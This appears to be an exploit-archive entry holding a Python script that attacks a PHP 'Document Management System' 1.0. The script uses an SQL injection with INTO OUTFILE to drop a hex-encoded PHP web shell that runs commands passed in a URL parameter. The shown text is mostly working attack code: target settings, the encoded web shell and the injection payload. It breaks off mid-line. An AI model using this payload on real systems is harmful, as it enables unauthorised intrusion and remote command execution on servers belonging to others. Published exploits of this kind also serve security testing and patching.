Authored by Richard Jones

Document Management System version 1.0 remote SQL injection exploit that deploys a web shell.

# Exploit Title: Document Management System - SQL Injection to RCE (webshell)
# Date: 23/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/7652/document-management-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

#!/usr/bin/python3
import requests
import sys
import urllib.parse
import time

URL=f"http://TARGET/doc_system/docsytems/" # Change URL
SAVEPATH="c:/xampp/htdocs/" #Change to webfolder root (ie: /var/www/html on unix)

HOSTNAME=urllib.parse.urlparse(f"{URL}").netloc
PHPPAYLOAD="3c3f7068702073797374656d28245f4745545b2763275d293b203f3e" #<?php system($_GET['c']);?>
PAYLOAD=f"-8087' OR 6017=6017 LIMIT 0,1 INTO OUTFILE '{SAVEPATH}xythif42taA.php' LINES TERMINATED BY 0x{PHPPAYLOAD}-- -" #Change filename if you wish, replace 'xythif42taA.php'

RS='